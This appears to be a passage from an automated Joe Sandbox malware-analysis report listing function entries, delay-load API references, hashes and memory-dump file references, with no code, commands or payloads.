                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<Y
                                                                                                                    • API String ID: 1269201914-326072144
                                                                                                                    • Opcode ID: fb9b72ed476d8f37819b60008d7dff02279344a3b262f96dece3f43d81123c99
                                                                                                                    • Instruction ID: b24811a03808c82b42653375deda6ac940abea5e763b666501ef779e30cb496c
                                                                                                                    • Opcode Fuzzy Hash: fb9b72ed476d8f37819b60008d7dff02279344a3b262f96dece3f43d81123c99
                                                                                                                    • Instruction Fuzzy Hash: E6B012D12680417C360891691D0FD7F0E0CF0C1F10330447EF490C0481BC405E050431
                                                                                                                    Function 0059E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    • Opcode ID: 8dbd54c7878be8293b4e3454ebbf191a6c2313eaa85bf160ab0bfdad51cf3f50
                                                                                                                    • Instruction ID: 3f0b8311c18579fd0c386672c1d221ca9cccb27f2cfd1ddda5f4a1b4b88daee7
                                                                                                                    • Opcode Fuzzy Hash: 8dbd54c7878be8293b4e3454ebbf191a6c2313eaa85bf160ab0bfdad51cf3f50
                                                                                                                    • Instruction Fuzzy Hash: 8DB012D22680417D360CD1991C0BD3B0E4CF0C0B1033144AFF444C20C0FC401C010435
                                                                                                                    Function 0059E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    • Opcode ID: 1c13e8647ef5ead2da298c62a83a2a5d547c89e93658d79c85fe8b3eaf7880c9
                                                                                                                    • Instruction ID: d8ebfce551785a3d4f5400b3f3ecbdac66f22ebb17edae53b2be8104180be30a
                                                                                                                    • Opcode Fuzzy Hash: 1c13e8647ef5ead2da298c62a83a2a5d547c89e93658d79c85fe8b3eaf7880c9
                                                                                                                    • Instruction Fuzzy Hash: D5B012E22681417C364CD1995C0BD3B0E5CF0C1B10335462FF444C20C0FC401C410435
                                                                                                                    Function 0059E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E580
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: FjunY
                                                                                                                    • API String ID: 1269201914-3672361588
                                                                                                                    • Opcode ID: 18775cdf128ecdc73cf697ba223371625f2f6b2418fe1c42da9f5d09845398d1
                                                                                                                    • Instruction ID: ab21c466b8bde56095bd6b743ae6b014002397735b8461c25bc0ee132833cb10
                                                                                                                    • Opcode Fuzzy Hash: 18775cdf128ecdc73cf697ba223371625f2f6b2418fe1c42da9f5d09845398d1
                                                                                                                    • Instruction Fuzzy Hash: 42B012E22680417C360CD1995D0BD3B0E5CF0C1B10335462FF444C20C0FC411D020435
                                                                                                                    Function 0059E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 21c2bf084d7c12c91fbbbfa028b827b73c328d277b9c3f41f46bec50358686a8
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: 21c2bf084d7c12c91fbbbfa028b827b73c328d277b9c3f41f46bec50358686a8
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 17e99c96dca8893d05b1daa73c37ffc0fe1ffa9dd0e513bf9fd1e379b3708146
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: 17e99c96dca8893d05b1daa73c37ffc0fe1ffa9dd0e513bf9fd1e379b3708146
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: d16bf3e2030e3b252a511d140f6eeb1283b757c05b098f2e46d48ec17847e3b1
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: d16bf3e2030e3b252a511d140f6eeb1283b757c05b098f2e46d48ec17847e3b1
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: da6c84f86d1ef1b0e7ce5beef3566b8501047c727d82174bc619ccf51d2b2950
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: da6c84f86d1ef1b0e7ce5beef3566b8501047c727d82174bc619ccf51d2b2950
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: e28279ca1a5830863c5114c42f63b37faf12251c00ced25ef4a5e653aa6b59f0
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: e28279ca1a5830863c5114c42f63b37faf12251c00ced25ef4a5e653aa6b59f0
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 43b8ebf6b515bb37804f0a77060d0cd06dd1e820192a60e119d2cf698c83d9c0
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: 43b8ebf6b515bb37804f0a77060d0cd06dd1e820192a60e119d2cf698c83d9c0
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 5c3ff8decb27d2873023fc3917e9df079fd1f44e17110b26777e2982b253d905
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: 5c3ff8decb27d2873023fc3917e9df079fd1f44e17110b26777e2982b253d905
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: e05e405c454e13abca02577096325be5b848d76157490440c954f38d2dbe06bd
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: e05e405c454e13abca02577096325be5b848d76157490440c954f38d2dbe06bd
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: 47232c3acbd94402fcef1d851438c8cbd25aec312d5212c146e64f4aad9211f1
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
                                                                                                                    • Opcode Fuzzy Hash: 47232c3acbd94402fcef1d851438c8cbd25aec312d5212c146e64f4aad9211f1
                                                                                                                    • Instruction Fuzzy Hash: 07A001E62A9543BC3928A2926D1BD7B0E1DE4C6B61330896EF856C84C1AC9078866875
                                                                                                                    Function 0059E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0059E1E3
                                                                                                                      • Part of subcall function 0059E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0059E8D0
                                                                                                                      • Part of subcall function 0059E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0059E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Y
                                                                                                                    • API String ID: 1269201914-2404400730
                                                                                                                    • Opcode ID: d0a2e640a60749eb3eeedc02d2a13af825b1a789c83d6c628bbad6c31c46d4ec
                                                                                                                    • Instruction ID: e712ceb37a3faba025d6bb1100d408cbb7dac4fcff19441cb9dbcf2cb97591d4
